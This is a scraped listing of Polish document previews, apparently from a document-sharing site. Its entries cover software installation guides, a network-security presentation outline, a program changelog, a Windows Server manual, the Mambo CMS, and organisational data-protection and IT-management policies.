Sieciowa instalacja Sekafi 3 SQL Sieciowa instalacja Sekafi 3 SQL Niniejsza instrukcja opisuje instalację Sekafi 3 SQL w wersji sieciowej, z zewnętrznym serwerem bazy danych. Jeśli wymagana jest praca jednostanowiskowa, należy postępować

Bardziej szczegółowo

Podstawy bezpieczeństwa

Podstawy bezpieczeństwa Podstawy bezpieczeństwa sieciowego Dariusz CHAŁADYNIAK 2 Plan prezentacji Złośliwe oprogramowanie Wybrane ataki na sieci teleinformatyczne Wybrane metody bezpieczeństwa sieciowego Systemy wykrywania intruzów

Bardziej szczegółowo

Wykaz zmian w programie SysLoger

Wykaz zmian w programie SysLoger Wykaz zmian w programie SysLoger Pierwsza wersja programu 1.0.0.1 powstała we wrześniu 2011. Funkcjonalność pierwszej wersji programu: 1. Zapis logów do pliku tekstowego, 2. Powiadamianie e-mail tylko

Bardziej szczegółowo

Instalowanie i konfigurowanie Windows Server 2012 R2

Instalowanie i konfigurowanie Windows Server 2012 R2 Mitch Tulloch Instalowanie i konfigurowanie Windows Server 2012 R2 Poradnik szkoleniowy Przekład: Leszek Biolik APN Promise, Warszawa 2014 Spis treści Wstęp.............................................................

Bardziej szczegółowo

I. Informacje ogólne. Jednym z takich systemów jest Mambo.

I. Informacje ogólne. Jednym z takich systemów jest Mambo. MAMBO (CMS) I. Informacje ogólne CMS, Content Management System ("system zarządzania treścią") jest to jedna lub zestaw aplikacji internetowych pozwalających na łatwe utworzenie oraz późniejszą aktualizację

Bardziej szczegółowo

Rozkład menu narzędzi

Rozkład menu narzędzi Tylko administrator systemu ma dostęp do wszystkich opcji Narzędzi. Ustawienia urządzenia Ogólne Oszczędzanie energii Inteligentny Uruchamiany pracą Planowany Data i godzina Strefa czasowa (różnica dla

Bardziej szczegółowo

DLA DREAMBOX & FLASHWIZARD

DLA DREAMBOX & FLASHWIZARD INSTALACJA I KONFIGURACJA NFS SERVER DLA DREAMBOX & FLASHWIZARD z wykorzystaniem MS Services for Unix Wymagania: Windows 2000 lub XP Professional System plików NTFS Pliki Passwd & Group które kopiujemy

Bardziej szczegółowo

Polityka Bezpieczeństwa Danych Osobowych. w sklepie internetowym kozakominek.pl prowadzonym przez firmę Worldflame Sp. z o. o.

Polityka Bezpieczeństwa Danych Osobowych. w sklepie internetowym kozakominek.pl prowadzonym przez firmę Worldflame Sp. z o. o. Polityka Bezpieczeństwa Danych Osobowych w sklepie internetowym kozakominek.pl prowadzonym przez firmę Worldflame Sp. z o. o. Spis treści 1. Ogólne zasady przetwarzania danych osobowych... 3 2. Analiza

Bardziej szczegółowo

INSTRUKCJA ZARZĄDZANIA SYSTEMAMI INFORMATYCZNYMI W COLLEGIUM MAZOVIA INNOWACYJNEJ SZKOLE WYŻSZEJ

INSTRUKCJA ZARZĄDZANIA SYSTEMAMI INFORMATYCZNYMI W COLLEGIUM MAZOVIA INNOWACYJNEJ SZKOLE WYŻSZEJ Załącznik nr 3 do Zarządzenia nr 1/2013 Rektora Collegium Mazovia Innowacyjnej Szkoły Wyższej z dnia 31 stycznia 2013 r. INSTRUKCJA ZARZĄDZANIA SYSTEMAMI INFORMATYCZNYMI W COLLEGIUM MAZOVIA INNOWACYJNEJ

Bardziej szczegółowo